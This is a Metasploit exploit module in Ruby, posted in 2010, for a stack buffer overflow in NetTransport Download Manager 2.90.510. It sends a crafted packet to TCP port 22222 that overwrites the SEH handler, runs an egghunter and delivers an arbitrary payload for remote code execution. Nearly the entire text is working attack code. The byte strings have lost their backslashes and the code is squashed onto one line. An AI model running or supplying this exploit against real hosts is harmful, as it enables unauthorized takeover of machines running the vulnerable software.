nettransport.rb.txt
Posted on 04 January 2010
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Egghunter include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'NetTransport Download Manager 2.90.510 Buffer Overflow', 'Description' => %q{ This exploits a stack overflow in NetTransport Download Manager, part of the NetXfer suite. This module was tested successfully against version 2.90.510. }, 'Author' => [ 'Lincoln', 'dookie', ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 7724 $', 'References' => [ [ 'OSVDB', '61435' ], [ 'URL', 'http://www.exploit-db.com/exploits/10911'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Payload' => { 'Space' => 5000, 'BadChars' => "x00x20x0ax0d", 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', { 'Ret' => 0x10002a57 } ], # p/p/r libssl.dll ], 'DefaultTarget' => 0)) register_options([Opt::RPORT(22222)], self.class) end def exploit connect magic_packet = "xe3x3dx00x00x00x01xeex4fx08xe3x00x0exaex41xb0x24" magic_packet << "x89x38x1cxc7x6fx6ex00x00x00x00xafx8dx04x00x00x00" magic_packet << "x02x01x00x01x04x00x74x65x73x74x03x01x00x11x3cx00" # Unleash the Egghunter! eh_stub, eh_egg = generate_egghunter sploit = magic_packet sploit << rand_text_alpha_upper(119) sploit << "xebx06x90x90" sploit << [target.ret].pack('V') sploit << make_nops(10) sploit << eh_stub sploit << make_nops(50) sploit << eh_egg * 2 sploit << payload.encoded print_status("Trying target #{target.name}...") sock.put(sploit) handler disconnect end def wfs_delay 25 end end
